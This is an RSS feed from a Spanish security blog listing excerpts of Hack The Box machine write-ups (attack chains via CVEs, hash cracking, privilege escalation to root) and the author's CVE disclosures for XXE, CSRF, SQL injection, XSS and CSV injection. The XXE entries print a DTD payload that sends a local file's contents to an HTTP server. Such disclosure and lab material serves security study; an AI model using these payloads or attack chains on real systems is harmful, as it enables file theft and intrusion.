<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>CVE Research on Hackpuntes</title><link>https://hackpuntes.com/es/categories/cve-research/</link><description>Recent content in CVE Research on Hackpuntes</description><generator>Hugo -- gohugo.io</generator><language>es-es</language><lastBuildDate>Sat, 27 Jun 2026 00:00:00 +0000</lastBuildDate><atom:link href="https://hackpuntes.com/es/categories/cve-research/index.xml" rel="self" type="application/rss+xml"/><item><title>WingData WriteUp</title><link>https://hackpuntes.com/es/posts/hackthebox/machines/wingdata-writeup/</link><pubDate>Sat, 27 Jun 2026 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/hackthebox/machines/wingdata-writeup/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/hackthebox/machines/wingdata/wingdata-banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/hackthebox/machines/wingdata/wingdata-banner.webp" alt="WingData WriteUp" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;WingData&lt;/strong&gt; es una máquina de dificultad &lt;code&gt;🟩 Fácil&lt;/code&gt; de la plataforma &lt;strong&gt;Hack The Box&lt;/strong&gt;, Season 10, creada por &lt;strong&gt;WackyH4cker&lt;/strong&gt;. La cadena de ataque combina la explotación de un &lt;strong&gt;Wing FTP Server vulnerable&lt;/strong&gt; para obtener acceso inicial, extracción y crackeo de credenciales desde ficheros de configuración, y escalada de privilegios mediante una vulnerabilidad en el módulo &lt;code&gt;tarfile&lt;/code&gt; de Python.&lt;/p&gt;
&lt;h2 id="-cadena-de-ataque"&gt;🗺️ Cadena de Ataque&lt;/h2&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;Reconocimiento → Puerto 80 + 22
│
▼
Enumeración web → ftp.wingdata.htb (Wing FTP Server v7.4.3)
│
▼
CVE-2025-47812 → RCE sin autenticación → Shell como wingftp
│
▼
/opt/wftpserver/Data/1/users/wacky.xml → Hash SHA-256 con sal
│
▼
Hashcat (modo 1410) → Contraseña en texto claro → SSH como wacky
│
▼
sudo -l → restore_backup_clients.py (root) → CVE-2025-4517
│
▼
Tar malicioso → path traversal → /etc/sudoers → root 🏴
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id="-reconocimiento"&gt;🔍 Reconocimiento&lt;/h2&gt;
&lt;h3 id="configuración-de-etchosts"&gt;Configuración de /etc/hosts&lt;/h3&gt;
&lt;p&gt;Antes de empezar, añadimos la IP de la máquina al fichero &lt;code&gt;/etc/hosts&lt;/code&gt; para poder usar el nombre de dominio en todas las herramientas:&lt;/p&gt;</description></item><item><title>VariaType WriteUp</title><link>https://hackpuntes.com/es/posts/hackthebox/machines/variatype-writeup/</link><pubDate>Sat, 13 Jun 2026 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/hackthebox/machines/variatype-writeup/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/hackthebox/machines/variatype/variatype-banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/hackthebox/machines/variatype/variatype-banner.webp" alt="VariaType WriteUp" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;VariaType&lt;/strong&gt; es una máquina de dificultad &lt;code&gt;🟧 Media&lt;/code&gt; de la plataforma &lt;strong&gt;Hack The Box&lt;/strong&gt;, Season 10. La cadena de ataque pasa por descubrir un repositorio Git expuesto en un portal interno, extraer credenciales del historial de commits, explotar una escritura arbitraria de ficheros en &lt;strong&gt;fontTools&lt;/strong&gt; para obtener una shell, moverse lateralmente abusando de la inyección de comandos en &lt;strong&gt;FontForge&lt;/strong&gt; mediante un archivo ZIP malicioso, y escalar a root aprovechando un path traversal en &lt;strong&gt;setuptools&lt;/strong&gt; a través de una regla &lt;code&gt;sudo&lt;/code&gt; mal configurada.&lt;/p&gt;</description></item><item><title>Interpreter WriteUp</title><link>https://hackpuntes.com/es/posts/hackthebox/machines/interpreter-writeup/</link><pubDate>Sat, 30 May 2026 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/hackthebox/machines/interpreter-writeup/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/hackthebox/machines/interpreter/interpreter-banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/hackthebox/machines/interpreter/interpreter-banner.webp" alt="Interpreter WriteUp" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Interpreter&lt;/strong&gt; es una máquina de dificultad &lt;code&gt;🟨 Media&lt;/code&gt; de la plataforma &lt;strong&gt;Hack The Box&lt;/strong&gt;, Season 10. La cadena de ataque combina la explotación de &lt;strong&gt;Mirth Connect 4.4.0&lt;/strong&gt; mediante deserialización Java insegura para obtener RCE sin autenticación, extracción de credenciales desde la base de datos interna, crackeo de un hash PBKDF2-HMAC-SHA256 y escalada de privilegios abusando de un servicio Flask con inyección en f-strings de Python.&lt;/p&gt;
&lt;h2 id="-cadena-de-ataque"&gt;🗺️ Cadena de Ataque&lt;/h2&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;Reconocimiento → Puertos 22, 80, 443
│
▼
Enumeración web → Mirth Connect 4.4.0 (via JNLP)
│
▼
CVE-2023-43208 → Deserialización Java insegura → RCE como mirth
│
▼
/usr/local/mirthconnect/conf/mirth.properties → Credenciales BD
│
▼
MariaDB (mc_bdd_prod) → Hash PBKDF2-HMAC-SHA256 de sedric
│
▼
Hashcat (modo 10900) → snowflake1 → SSH como sedric
│
▼
/usr/local/bin/notif.py → Flask + eval() en f-strings → SSTI
│
▼
SUID bash → root 🏴
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id="-reconocimiento"&gt;🔍 Reconocimiento&lt;/h2&gt;
&lt;h3 id="configuración-de-etchosts"&gt;Configuración de /etc/hosts&lt;/h3&gt;
&lt;p&gt;Antes de empezar, añadimos la IP de la máquina al fichero &lt;code&gt;/etc/hosts&lt;/code&gt;:&lt;/p&gt;</description></item><item><title>MonitorsFour WriteUp</title><link>https://hackpuntes.com/es/posts/hackthebox/machines/monitorsfour-writeup/</link><pubDate>Sat, 23 May 2026 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/hackthebox/machines/monitorsfour-writeup/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/hackthebox/machines/monitorsfour/monitorsfour-banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/hackthebox/machines/monitorsfour/monitorsfour-banner.webp" alt="MonitorsFour WriteUp" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;MonitorsFour&lt;/strong&gt; es una máquina de dificultad &lt;code&gt;🟩 Fácil&lt;/code&gt; de la plataforma &lt;strong&gt;Hack The Box&lt;/strong&gt;. La cadena de ataque comienza explotando un endpoint con IDOR y comparación laxa de PHP para filtrar credenciales de administrador, continúa con ejecución remota de código en &lt;strong&gt;Cacti 1.2.28&lt;/strong&gt; mediante &lt;strong&gt;CVE-2025-24367&lt;/strong&gt; y concluye escapando del contenedor Docker abusando de la &lt;strong&gt;API del daemon&lt;/strong&gt; expuesta sin autenticación en la subred interna de Docker Desktop (&lt;strong&gt;CVE-2025-9074&lt;/strong&gt;).&lt;/p&gt;</description></item><item><title>CVE-2019-19032 XMLBlueprint &lt;= 16.191112 - Inyección XML (XXE)</title><link>https://hackpuntes.com/es/posts/cve-2019-19032-xmlblueprint-16-191112-inyeccion-xml/</link><pubDate>Mon, 25 Nov 2019 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2019-19032-xmlblueprint-16-191112-inyeccion-xml/</guid><description>&lt;h2 id="resumen"&gt;Resumen&lt;/h2&gt;
&lt;p&gt;Se ha detectado una vulnerabilidad de &lt;strong&gt;&lt;a href="https://www.owasp.org/index.php/XML_External_Entity_%5c%28XXE%5c%29_Processing" target="_blank" rel="noopener noreferrer"&gt;inyección XML&lt;/a&gt;
&lt;/strong&gt; (XXE) basada en entidades externas (DTD) en el software &lt;a href="https://www.xmlblueprint.com/documents/xmlblueprint-16.191112.exe" target="_blank" rel="noopener noreferrer"&gt;&lt;strong&gt;XMLBlueprint versión 16.191112&lt;/strong&gt;&lt;/a&gt;
 y posiblemente anteriores. Esta vulnerabilidad está asociada al &lt;strong&gt;&lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19032" target="_blank" rel="noopener noreferrer"&gt;CVE-2019-19032&lt;/a&gt;
&lt;/strong&gt;.&lt;/p&gt;
&lt;h2 id="impacto"&gt;Impacto&lt;/h2&gt;
&lt;p&gt;Un usuario malintencionado, podría generar un archivo XML malicioso con la intención de causar una &lt;strong&gt;denegación de servicio a la aplicación o leer archivos arbitrarios&lt;/strong&gt; del sistema.&lt;/p&gt;
&lt;h2 id="prueba-de-concepto"&gt;Prueba de concepto&lt;/h2&gt;
&lt;div style="position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;"&gt;
&lt;iframe allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen" loading="eager" referrerpolicy="strict-origin-when-cross-origin" src="https://www.youtube.com/embed/N6cpCPwm8ys?autoplay=0&amp;amp;controls=1&amp;amp;end=0&amp;amp;loop=0&amp;amp;mute=0&amp;amp;start=0" style="position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;" title="YouTube video"&gt;&lt;/iframe&gt;
&lt;/div&gt;
&lt;ol&gt;
&lt;li&gt;Iniciar un servidor web.&lt;/li&gt;
&lt;/ol&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;python -m SimpleHTTPServer 80
&lt;/code&gt;&lt;/pre&gt;&lt;ol start="2"&gt;
&lt;li&gt;Subir el siguiente archivo &lt;strong&gt;payload.dtd&lt;/strong&gt; al servidor.&lt;/li&gt;
&lt;/ol&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;&amp;lt;?xml version=&amp;#34;1.0&amp;#34; encoding=&amp;#34;UTF-8&amp;#34;?&amp;gt;
&amp;lt;!ENTITY % all &amp;#34;&amp;lt;!ENTITY send SYSTEM &amp;#39;http://localhost:80/?%file;&amp;#39;&amp;gt;&amp;#34;&amp;gt;
%all;
&lt;/code&gt;&lt;/pre&gt;&lt;ol start="3"&gt;
&lt;li&gt;
&lt;p&gt;Crear un archivo de texto &lt;strong&gt;(secret.txt)&lt;/strong&gt; en el escritorio con cualquier contenido.&lt;/p&gt;</description></item><item><title>CVE-2019-19031 Easy XML Editor &lt;= 1.7.8 - Inyección XML</title><link>https://hackpuntes.com/es/posts/cve-2019-19031-easy-xml-editor-1-7-8-inyeccion-xml/</link><pubDate>Fri, 22 Nov 2019 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2019-19031-easy-xml-editor-1-7-8-inyeccion-xml/</guid><description>&lt;h2 id="resumen"&gt;Resumen&lt;/h2&gt;
&lt;p&gt;Se ha detectado una vulnerabilidad de &lt;strong&gt;&lt;a href="https://www.owasp.org/index.php/XML_External_Entity_%5c%28XXE%5c%29_Processing" target="_blank" rel="noopener noreferrer"&gt;inyección XML&lt;/a&gt;
&lt;/strong&gt; basada en entidades externas (DTD) en el software &lt;strong&gt;&lt;a href="https://www.edit-xml.com/Easy_XML_Editor.exe" target="_blank" rel="noopener noreferrer"&gt;Easy XML Editor versión 1.7.8&lt;/a&gt;
&lt;/strong&gt; y posiblemente anteriores. Esta vulnerabilidad está asociada al &lt;strong&gt;&lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19031" target="_blank" rel="noopener noreferrer"&gt;CVE-2019-19031&lt;/a&gt;
&lt;/strong&gt;.&lt;/p&gt;
&lt;h2 id="impacto"&gt;Impacto&lt;/h2&gt;
&lt;p&gt;Un usuario malintencionado, podría generar un archivo XML malicioso con la intención de causar una &lt;strong&gt;denegación de servicio a la aplicación o leer archivos arbitrarios&lt;/strong&gt; del sistema.&lt;/p&gt;
&lt;h2 id="prueba-de-concepto"&gt;Prueba de concepto&lt;/h2&gt;
&lt;div style="position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;"&gt;
&lt;iframe allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share; fullscreen" loading="eager" referrerpolicy="strict-origin-when-cross-origin" src="https://www.youtube.com/embed/DXssm4Ll-EE?autoplay=0&amp;amp;controls=1&amp;amp;end=0&amp;amp;loop=0&amp;amp;mute=0&amp;amp;start=0" style="position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;" title="YouTube video"&gt;&lt;/iframe&gt;
&lt;/div&gt;
&lt;ol&gt;
&lt;li&gt;Iniciar un servidor web.&lt;/li&gt;
&lt;/ol&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;python -m SimpleHTTPServer 80
&lt;/code&gt;&lt;/pre&gt;&lt;ol start="2"&gt;
&lt;li&gt;Subir el siguiente archivo &lt;strong&gt;payload.dtd&lt;/strong&gt; al servidor.&lt;/li&gt;
&lt;/ol&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;&amp;lt;?xml version=&amp;#34;1.0&amp;#34; encoding=&amp;#34;UTF-8&amp;#34;?&amp;gt;
&amp;lt;!ENTITY % all &amp;#34;&amp;lt;!ENTITY send SYSTEM &amp;#39;http://localhost:80/?%file;&amp;#39;&amp;gt;&amp;#34;&amp;gt;
%all;
&lt;/code&gt;&lt;/pre&gt;&lt;ol start="3"&gt;
&lt;li&gt;
&lt;p&gt;Crear un archivo de texto &lt;strong&gt;(secret.txt)&lt;/strong&gt; en el escritorio con cualquier contenido.&lt;/p&gt;</description></item><item><title>CVE-2019-15092 WordPress Plugin Import Export Users = 1.3.0 - CSV Injection</title><link>https://hackpuntes.com/es/posts/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection/</link><pubDate>Thu, 22 Aug 2019 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection/</guid><description>&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection_banner.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection_banner.webp" alt="CVE-2019-15092 WordPress Plugin Import Export Users = 1.3.0 - CSV Injection" loading="eager" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="impacto"&gt;Impacto&lt;/h2&gt;
&lt;p&gt;Un usuario malicioso con &lt;strong&gt;permisos básicos&lt;/strong&gt; de WordPress (suscriptor) podría &lt;strong&gt;ejecutar comandos&lt;/strong&gt; en el equipo del administrador a través de &lt;strong&gt;inyecciones CSV&lt;/strong&gt; en los campos &lt;code&gt;display_name&lt;/code&gt;, &lt;code&gt;first_name&lt;/code&gt; y &lt;code&gt;last_name&lt;/code&gt;.&lt;/p&gt;
&lt;h2 id="cvss-v31-vector"&gt;CVSS v3.1 Vector&lt;/h2&gt;
&lt;p&gt;AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H&lt;/p&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection_001.webp" alt="CVE-2019-15092 WordPress Plugin Import Export Users = 1.3.0 - CSV Injection" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection_002.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection_002.webp" alt="CVE-2019-15092 WordPress Plugin Import Export Users = 1.3.0 - CSV Injection" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>CVE-2019-14346 Adive Framework 2.0.7 - Cross-Site Request Forgery</title><link>https://hackpuntes.com/es/posts/cve-2019-14346-adive-framework-2-0-7-cross-site-request-forgery/</link><pubDate>Fri, 02 Aug 2019 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2019-14346-adive-framework-2-0-7-cross-site-request-forgery/</guid><description>&lt;p&gt;Las vulnerabilidades &lt;a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%5c%28CSRF%5c%29" target="_blank" rel="noopener noreferrer"&gt;Cross-Site Request Forgery (CSRF)&lt;/a&gt;
 encontradas en Adive Framework 2.0.7 &lt;strong&gt;permiten a un usuario malintencionado realizar acciones como cambiar la contraseña de un usuario&lt;/strong&gt; a través de este ataque. La vulnerabilidad, ha sido asociada al &lt;strong&gt;CVE-2019-14346&lt;/strong&gt;.&lt;/p&gt;
&lt;h2 id="cve-2019-14346"&gt;CVE-2019-14346&lt;/h2&gt;
&lt;h3 id="adive-framework-207--cross-site-request-forgery"&gt;Adive Framework 2.0.7 – Cross-Site Request Forgery&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2019-14346-adive-framework-2-0-7-cross-site-request-forgery/cve-2019-14346-adive-framework-2-0-7-cross-site-request-forgery_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2019-14346-adive-framework-2-0-7-cross-site-request-forgery/cve-2019-14346-adive-framework-2-0-7-cross-site-request-forgery_001.webp" alt="CVE-2019-14346 Adive Framework 2.0.7 - Cross-Site Request Forgery" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;a href="https://adive.es/" target="_blank" rel="noopener noreferrer"&gt;www.adive.es&lt;/a&gt;
&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;📅 Vulnerabilidad descubierta por Pablo Santiago el &lt;strong&gt;02/08/2019&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;🐛 &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14346" target="_blank" rel="noopener noreferrer"&gt;CVE-2019-14346&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;🔗 Link del software &lt;a href="https://www.adive.es/" target="_blank" rel="noopener noreferrer"&gt;web&lt;/a&gt;
 y del &lt;a href="https://github.com/ferdinandmartin/adive-php7" target="_blank" rel="noopener noreferrer"&gt;github&lt;/a&gt;
 con el proyecto.&lt;/li&gt;
&lt;li&gt;🐞 Versión vulnerable = &lt;strong&gt;2.0.7&lt;/strong&gt; y anteriores probablemente.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Solución&lt;/strong&gt;: Añadir tokens anti-CSRF en las peticiones.&lt;/p&gt;</description></item><item><title>CVE-2019-14347 Escalacion de privilegios en Adive</title><link>https://hackpuntes.com/es/posts/cve-2019-14347-escalacion-de-privilegios-en-adive/</link><pubDate>Fri, 02 Aug 2019 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2019-14347-escalacion-de-privilegios-en-adive/</guid><description>&lt;h2 id="adive-framework-207"&gt;Adive Framework 2.0.7&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2019-14347-escalacion-de-privilegios-en-adive/cve-2019-14347-escalacion-de-privilegios-en-adive_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2019-14347-escalacion-de-privilegios-en-adive/cve-2019-14347-escalacion-de-privilegios-en-adive_001.webp" alt="CVE-2019-14347 Escalacion de privilegios en Adive" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.adive.es/" target="_blank" rel="noopener noreferrer"&gt;https://www.adive.es/&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Adive es un Framework PHP 7 para desarrollar webs y aplicaciones en línea,administra bases de datos MySQL, es una alternativa rápida, fácil y excelente para generar plantillas teniendo así la principal estructura visual de cualquier pagina web. Esta versión incluye un kit de herramientas para desarrolladores para generar tablas, campos y entidades, formas de control y bases de datos. Adive es un ambicioso proyecto de Schben, cuyo objetivo es convertir la «codificación» en «diseño».&lt;/p&gt;</description></item><item><title>CVE 2019-14348 JoomSport - for Sports - SQL injection</title><link>https://hackpuntes.com/es/posts/cve-2019-14348-joomsport-for-sports-sql-injection/</link><pubDate>Mon, 29 Jul 2019 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2019-14348-joomsport-for-sports-sql-injection/</guid><description>&lt;h2 id="joomsport-33-for-sports-team--league-football-hockey--more"&gt;JoomSport 3.3– for Sports: Team &amp;amp; League, Football, Hockey &amp;amp; more&lt;/h2&gt;
&lt;p&gt;JoomSport es un plugin de WordPress desarrollado en 2009 que ofrece características esenciales para cualquier sitio de deporte, estándares de ligas de deportes, deportes de equipo con sus respectivas descripciones, historial de partidos, estadísticas y fotos, incluyendo los enfrentamientos entre los equipos con los goles o tantos anotados por ambos equipos y detalles de los partidos.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;📅 Vulnerabilidad descubierta por Pablo Santiago el &lt;strong&gt;29/07/2019&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;🐛 &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14348" target="_blank" rel="noopener noreferrer"&gt;CVE-2019-14348&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.exploit-db.com/exploits/47210" target="_blank" rel="noopener noreferrer"&gt;ExploitDB&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;🔗 Link del software &lt;a href="https://wordpress.org/plugins/joomsport-sports-league-results-management/" target="_blank" rel="noopener noreferrer"&gt;JoomSport&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;🐞 Versión vulnerable = &lt;strong&gt;3.3&lt;/strong&gt; y anteriores probablemente.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Solución&lt;/strong&gt;: Parchear la vulnerabilidad para la siguiente versión filtrando los datos de entradas introducidos por el usuario.&lt;/p&gt;</description></item><item><title>CVE-2019-7400 Rukovoditel ERP &amp; CRM 2.4.1 - Cross-Site Scripting Reflejado</title><link>https://hackpuntes.com/es/posts/cve-2019-7400-rukovoditel-erp-crm-2-4-1-cross-site-scripting-reflejado/</link><pubDate>Sun, 24 Mar 2019 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2019-7400-rukovoditel-erp-crm-2-4-1-cross-site-scripting-reflejado/</guid><description>&lt;h2 id="cve-2019-7400"&gt;CVE-2019-7400&lt;/h2&gt;
&lt;h3 id="rukovoditel-erp--crm-241--cross-site-scripting-reflejado"&gt;Rukovoditel ERP &amp;amp; CRM 2.4.1 – Cross-Site Scripting Reflejado&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2019-7400-rukovoditel-erp-crm-2-4-1-cross-site-scripting-reflejado/cve-2019-7400-rukovoditel-erp-crm-2-4-1-cross-site-scripting-reflejado_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2019-7400-rukovoditel-erp-crm-2-4-1-cross-site-scripting-reflejado/cve-2019-7400-rukovoditel-erp-crm-2-4-1-cross-site-scripting-reflejado_001.webp" alt="CVE-2019-7400 Rukovoditel ERP &amp;amp; CRM 2.4.1 - Cross-Site Scripting Reflejado" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Rukovoditel es una aplicación gratuita de &lt;strong&gt;gestión de proyectos de código abierto&lt;/strong&gt; basada en web. Muy lejos de las aplicaciones tradicionales, Rukovoditel ofrece a los usuarios un enfoque más amplio y extenso de la gestión de proyectos. Sus opciones de personalización permiten a los usuarios crear entidades adicionales, modificar y especificar la relación entre ellas y generar los informes necesarios. La plataforma permite a los usuarios crear su propia aplicación que está específicamente diseñada para su actividad (CRM, ERP, HRM, WMS, etc.)&lt;/p&gt;</description></item><item><title>CVE-2018-19829 Integria IMS 5.0.83 - Cross-Site Request Forgery</title><link>https://hackpuntes.com/es/posts/cve-2018-19829-integria-ims-5-0-83-cross-site-request-forgery/</link><pubDate>Mon, 17 Dec 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2018-19829-integria-ims-5-0-83-cross-site-request-forgery/</guid><description>&lt;p&gt;Las vulnerabilidades &lt;a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%5c%28CSRF%5c%29" target="_blank" rel="noopener noreferrer"&gt;Cross-Site Request Forgery (CSRF)&lt;/a&gt;
 encontradas en el software &lt;a href="https://sourceforge.net/projects/integria/files/5.0.83/" target="_blank" rel="noopener noreferrer"&gt;Integria IMS 5.0.83&lt;/a&gt;
 han quedado solucionadas. Estas, &lt;strong&gt;permitían a un usuario malintencionado borrar usuarios de la aplicación&lt;/strong&gt; a través de este ataque. La vulnerabilidad, ha sido asociada al &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-19829" target="_blank" rel="noopener noreferrer"&gt;CVE-2018-19829&lt;/a&gt;
.&lt;/p&gt;
&lt;h2 id="cve-2018-19829"&gt;CVE-2018-19829&lt;/h2&gt;
&lt;h3 id="integria-ims-5083---cross-site-request-forgery-csrf"&gt;Integria IMS 5.0.83 - Cross-Site Request Forgery (CSRF)&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2018-19829-integria-ims-5-0-83-cross-site-request-forgery/cve-2018-19829-integria-ims-5-0-83-cross-site-request-forgery_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2018-19829-integria-ims-5-0-83-cross-site-request-forgery/cve-2018-19829-integria-ims-5-0-83-cross-site-request-forgery_001.webp" alt="CVE-2018-19829 Integria IMS 5.0.83 - Cross-Site Request Forgery" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Integria IMS es un &lt;strong&gt;software de help desk&lt;/strong&gt; sencillo, potente y fácil de usar. Dispone de inventario automatizado y controlado desde un solo interfaz. Agiliza los procesos reduciendo los tiempos y costes de gestión en sus proyectos. Gracias a sus informes personalizados estará informado y podrá ver fácilmente la gestión y calidad del servicio dado en tiempo real.&lt;/p&gt;</description></item><item><title>CVE-2018-19828 Integria IMS 5.0.83 - Cross-Site Scripting Reflejado</title><link>https://hackpuntes.com/es/posts/cve-2018-19828-integria-ims-5-0-83-cross-site-scripting-reflejado/</link><pubDate>Fri, 14 Dec 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2018-19828-integria-ims-5-0-83-cross-site-scripting-reflejado/</guid><description>&lt;h2 id="cve-2018-19828"&gt;CVE-2018-19828&lt;/h2&gt;
&lt;h3 id="integria-ims-5083---cross-site-scripting-reflejado"&gt;Integria IMS 5.0.83 - Cross-Site Scripting Reflejado&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://hackpuntes.com/images/cve-2018-19828-integria-ims-5-0-83-cross-site-scripting-reflejado/cve-2018-19828-integria-ims-5-0-83-cross-site-scripting-reflejado_001.webp"&gt;&lt;img src="https://hackpuntes.com/images/cve-2018-19828-integria-ims-5-0-83-cross-site-scripting-reflejado/cve-2018-19828-integria-ims-5-0-83-cross-site-scripting-reflejado_001.webp" alt="CVE-2018-19828 Integria IMS 5.0.83 - Cross-Site Scripting Reflejado" loading="lazy" decoding="async" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Integria IMS es un &lt;strong&gt;software de help desk&lt;/strong&gt; sencillo, potente y fácil de usar. Dispone de inventario automatizado y controlado desde un solo interfaz. Agiliza los procesos reduciendo los tiempos y costes de gestión en sus proyectos. Gracias a sus informes personalizados estará informado y podrá ver fácilmente la gestión y calidad del servicio dado en tiempo real.&lt;/p&gt;</description></item><item><title>CVE-2018-18921 PHP Server Monitor 3.3.1 - Cross-Site Request Forgery</title><link>https://hackpuntes.com/es/posts/cve-2018-18921-php-server-monitor-3-3-1-cross-site-request-forgery/</link><pubDate>Mon, 03 Dec 2018 00:00:00 +0000</pubDate><guid>https://hackpuntes.com/es/posts/cve-2018-18921-php-server-monitor-3-3-1-cross-site-request-forgery/</guid><description>&lt;p&gt;Las vulnerabilidades &lt;a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%5c%28CSRF%5c%29" target="_blank" rel="noopener noreferrer"&gt;Cross-Site Request Forgery (CSRF)&lt;/a&gt;
 encontradas en el software &lt;a href="https://github.com/phpservermon/phpservermon/releases/tag/v3.3.1" target="_blank" rel="noopener noreferrer"&gt;PHP Server Monitor 3.3.1&lt;/a&gt;
 han quedado solucionadas. Estas, &lt;strong&gt;permitían a un usuario malintencionado borrar servidores, logs y usuarios de la aplicación&lt;/strong&gt; a través de este ataque. La vulnerabilidad, ha sido asociada al &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-18921" target="_blank" rel="noopener noreferrer"&gt;CVE-2018-18921&lt;/a&gt;
.&lt;/p&gt;
